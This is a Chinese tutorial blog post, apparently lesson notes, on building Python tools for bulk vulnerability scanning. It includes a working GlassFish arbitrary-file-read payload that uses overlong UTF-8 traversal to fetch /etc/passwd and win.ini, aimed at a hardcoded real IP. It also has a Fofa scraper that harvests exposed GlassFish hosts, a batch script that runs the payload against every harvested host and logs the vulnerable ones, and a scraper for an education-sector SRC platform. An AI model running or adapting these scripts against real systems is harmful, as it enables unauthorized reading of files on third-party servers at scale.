77:Python开发-批量Fofa&POC验证&SRC提取

本课知识点:
  • Request爬虫技术,lxml数据提取,异常处理,fofa等使用说明
学习目的:
  • 掌握利用公开或0day漏洞进行批量化的收集及验证脚本开发

案例1:某漏洞POC验证脚本

漏洞学习:
验证脚本:
# Author:Zhengna

import requests

def glassfish_vcheck(url):

    payload_linux = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
    payload_windows = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Windows/win.ini"

    data_linux = requests.get(url+payload_linux) #获取请求后的返回源代码
    data_windows = requests.get(url+payload_windows) #获取请求后的返回源代码

    statuscode_linux = data_linux.status_code    #获取请求后的返回状态码
    statuscode_windows = data_windows .status_code   #获取请求后的返回状态码

    if statuscode_linux == 200:
        print("glassfish任意文件读取漏洞存在")
        print(data_linux.text)
    elif statuscode_windows == 200:
        print("glassfish任意文件读取漏洞存在")
        print(data_windows.text)
    else:
        print("glassfish任意文件读取漏洞不存在")

if __name__ == '__main__':
    #可以进入fofa网址,搜索app="glassfish" && port="4848",找到可能存在漏洞的网站。
    url = "http://3.0.49.154:4848"
    glassfish_vcheck(url)

    #连接异常可参考解决方法:https://blog.csdn.net/a1007720052/article/details/83383220
glassfish任意文件读取漏洞POC

案例2:Fofa搜索结果批量采集脚本

1.手动采集
  • 进入fofa网址(https://fofa.so/),搜索"glassfish" && port="4848",找到可能存在漏洞的网站。
2.批量采集
# Author:Serena
import requests,base64,time
from lxml import etree #提前安装 lxml模块:python3 -m pip install  lxml

'''
如何实现这个漏洞批量化:
    1.获取到可能存在漏洞的地址信息-借助Fofa进行获取目标
        1.1将请求的数据进行筛选
    2.批量请求地址信息进行判断是否存在-单线程和多线程
'''
#非会员,只能收集10条
def ip_collect():
    url = "https://fofa.so/result?qbase64="
    search_data = '"glassfish" && port="4848" && country="CN" '
    # search_data = '"glassfish" && port="4848" '
    search_data_b64 = base64.b64encode(search_data.encode("utf-8")).decode("utf-8")
    urls = url+search_data_b64
    result = requests.get(urls).content
    soup = etree.HTML(result)
    ip_data = soup.xpath('//span[@class = "aSpan"]/a[@target="_blank"]/@href')
    ip_data=set(ip_data) #去除重复的IP
    # print(ip_data)
    ipdata = '\n'.join(ip_data)
    with open(r'ip-10.txt','a+') as f:
        f.write(ipdata+'\n')

#会员,可收集很多条
def ip_collect_vip():
    search_data = '"glassfish" && port="4848"'
    search_data_b64 = base64.b64encode(search_data.encode("utf-8")).decode("utf-8")
    headers = {
        'cookie':'_fofapro_ars_session=aaaaaaaaaaaaaaaaaaaaaaaaa'
    }
    for pageNumber in range(1,11):
        urls = "https://fofa.so/result?page="+str(pageNumber)+"&qbase64="+search_data_b64
        print('正在提取第'+str(pageNumber)+'')
        try:
            result = requests.get(urls,headers=headers,timeout=0.5).content
            soup = etree.HTML(result)
            ip_data = soup.xpath('//span[@class = "aSpan"]/a[@target="_blank"]/@href')
            ip_data = set(ip_data)  # 去除重复的IP
            print(ip_data)
            ipdata = '\n'.join(ip_data)
            with open(r'ip-200.txt','a+') as f:
                f.write(ipdata+'\n')
        except Exception as e:
            pass

if __name__ == '__main__':
    ip_collect()
    # ip_collect_vip()
Fofa批量提取

案例3:某漏洞POC批量验证脚本

# Author:Zhengna
import time

import requests


def glassfish_vcheck():

    payload_linux = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
    payload_windows = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Windows/win.ini"

    for url in open('ip-10.txt'):
        url = url.replace('\n', '')

        data_linux = requests.get(url + payload_linux)  # 获取请求后的返回源代码
        data_windows = requests.get(url + payload_windows)  # 获取请求后的返回源代码

        statuscode_linux = data_linux.status_code  # 获取请求后的返回状态码
        statuscode_windows = data_windows.status_code  # 获取请求后的返回状态码

        print("check->" + url)
        try:
            with open(r'vuln.txt', 'a+',encoding='utf8') as f:
                if statuscode_linux == 200:
                    f.write("-----------------------------------------------\n")
                    f.write(url + "存在glassfish任意文件读取漏洞\n")
                    f.write(url + "是linux系统\n")
                    # f.write(data_linux.text)
                elif statuscode_windows == 200:
                    f.write("-----------------------------------------------\n")
                    f.write(url + "存在glassfish任意文件读取漏洞\n")
                    f.write(url + "是windows系统\n")
                    # f.write(data_windows.text)
                else:
                    f.write("-----------------------------------------------\n")
                    f.write(url + "不存在glassfish任意文件读取漏洞\n")
            time.sleep(0.5)
        except Exception as e:
            pass

if __name__ == '__main__':
    glassfish_vcheck()
glassfish任意文件读取漏洞POC批量验证

案例4:教育SRC报告平台信息批量提取脚本

教育行业漏洞报告平台(Beta):https://src.sjtu.edu.cn/
# Author:zhengna
import requests,time
from lxml import etree

def src_collect(page):
    try:
        for i in range(1,int(page)+1):
            url = "https://src.sjtu.edu.cn/list/?page="+str(i)
            print("正在提取第"+str(i)+"")
            r = requests.get(url).content
            soup = etree.HTML(r)
            result = soup.xpath('//td[@class=""]/a/text()')
            results = '\n'.join(result)
            resultss = results.split()
            for edu in resultss:
                with open(r'src-edu.txt','a+',encoding='utf-8') as f:
                    f.write(edu + '\n')
    except Exception as e:
        time.sleep(0.5)
        pass

if __name__ == '__main__':
    page = input("你需要提取几页?-->")
    src_collect(page)
src_collect

 

posted @ 2021-08-19 19:57  zhengna  阅读(742)  评论(0编辑  收藏  举报